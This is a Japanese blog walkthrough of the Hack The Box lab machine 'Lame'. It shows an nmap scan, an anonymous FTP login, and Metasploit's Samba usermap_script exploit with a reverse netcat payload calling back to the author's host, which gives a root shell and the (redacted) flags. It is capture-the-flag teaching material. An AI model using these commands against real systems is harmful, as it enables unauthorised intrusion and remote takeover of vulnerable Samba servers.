Ccmmutty logo
Commutty IT
10 min read

hack the box ~魔法使いへの道~ (その7) 【Walkthrough】Lame

htbhacktheboxハッカーセキュリティ
https://cdn.magicode.io/media/notebox/ff8924fd-9db2-438c-b55c-88235bd58a86.jpeg

はじめに

情報セキュリティの分野では,ハッキング技術を持った攻撃者から自分たちのシステムを守るために,ホワイトハッカーと呼ばれるエンジニアたちが存在します.この記事では,ホワイトハッカーを目指すエンジニアに向けて,Hack the Box で Metasploit というツールをして「Lame」を攻略したWalkthroughを紹介します.

Hack the Box

Hack the Box とは

Hack the Box は,セキュリティに関する技術を身につけることができる,オンライン上のプラットフォームです.このプラットフォームでは,様々なセキュリティに関する問題が用意されており,ユーザーはこれらの問題を解決することで,セキュリティのスキルを向上させることができます.

Hack the Box の利用方法

Hack the Box の利用方法は簡単です.まずは,Hack the Box のウェブサイトにアクセスし,アカウントを作成します.アカウントを作成した後,問題を解決するために必要な情報が提供されます.この情報を利用して,問題を解決していくことができます.

Hack the Box で学べること

Hack the Box で学ぶことができることは以下の通りです.
  • ペネトレーションテスト
  • クラッキング
  • スキャン
  • スニッフィング
  • ウェブアプリケーションのセキュリティ

Metasploit

Metasploit とは

Metasploit は,ペネトレーションテストに使用されるツールです.Metasploit を使用することで,システムの脆弱性を検出し,攻撃者が侵入してくることを予防することができます.

Metasploit の利用方法

Metasploit の利用方法は,Hack the Box と同様に簡単です.まずは,Metasploit のウェブサイトから,Metasploit をダウンロードしてインストールします.インストールが完了したら,Metasploit のコマンドラインインターフェースを開いて,使用したい機能を選択します.

Metasploit で学べること

Metasploit で学ぶことができることは以下の通りです.
  • 様々な脆弱性の攻撃方法
  • 様々なプロトコルの攻撃方法
  • ペネトレーションテストの手法
  • リモートコード実行攻撃
  • 社内侵入テストの手法
  • 情報収集の手法
  • 脆弱性スキャンの手法
  • 権限昇格攻撃
  • ストレステストの手法

NMAP

NMAP とは

NMAP は,ネットワークスキャンを行うためのツールです.NMAP を使用することで,ネットワークに接続されているデバイスやオープンしているポートなどを検出することができます.これは,セキュリティの観点から非常に重要な情報であり,ネットワークの脆弱性を特定するために使用されます.

NMAP の利用方法

NMAP の利用方法は簡単です.NMAP のウェブサイトから,NMAP をダウンロードしてインストールします.インストールが完了したら,コマンドラインから NMAP を実行することができます.

NMAP で学べること

NMAP で学ぶことができることは以下の通りです.
  • ネットワークスキャン
  • ポートスキャン
  • OS検出

FTP

FTP とは

FTP(File Transfer Protocol)は,ファイルを転送するためのプロトコルです.FTP を使用することで,ファイルをサーバーにアップロードしたり,サーバーからファイルをダウンロードすることができます.

FTP の利用方法

FTP を利用するには,FTP クライアントソフトを使用する必要があります.一般的な FTP クライアントソフトには,FileZilla や WinSCP などがあります.これらのソフトウェアを使用することで,FTP サーバーに接続してファイルを転送することができます.

FTP で学べること

FTP で学ぶことができることは以下の通りです.
  • ファイル転送
  • ファイル共有
  • セキュリティ

Walkthrough とは

Walkthrough は,ハッキングの実践的な手法のひとつで,問題を解決するための手順を明確に示したものです.Walkthrough を行うことで,実際に攻撃者がどのようにシステムに侵入するかを理解することができます.

NMAPを使ってみる

まずはNMAPをしていきます.
┌──(root㉿kali-makiCh)-[/home/maki]
└─# nmap -sVC -Pn  10.10.10.3                                                                      
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-03 01:29 JST
Nmap scan report for lame.htb (10.10.10.3)
Host is up (0.29s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-08-02T12:31:08-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m45s, deviation: 2h49m43s, median: 44s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.68 seconds

FTPポートを探ってみる

FTPが怪しいのですが,探っていくと何もないので諦めます.
┌──(root㉿kali-makiCh)-[/home/maki]
└─# ftp 
ftp> open 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:maki): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||44645|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||53003|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp>

Exploit

SMBを使って攻略していきます.
msf6 exploit(multi/samba/usermap_script) > ip a
[*] exec: ip a


・・・・・

3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
    link/none 
    inet 10.10.14.4/23 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::1002/64 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::a8a0:7e27:99b4:a476/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
                                      sing-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.155    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
                                      sing-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.4       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Command shell session 1 opened (10.10.14.4:4444 -> 10.10.10.3:58528 ) at 2022-08-05 21:20:43 +0900
無事にrootを取れました.あとはフラグを探すだけです.
whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root
cat: root: No such file or directory
^[[A             : command not found
cat root.txte 8: 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

cd makis
ls
user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
pwd
/home/makis

Discussion

コメントにはログインが必要です。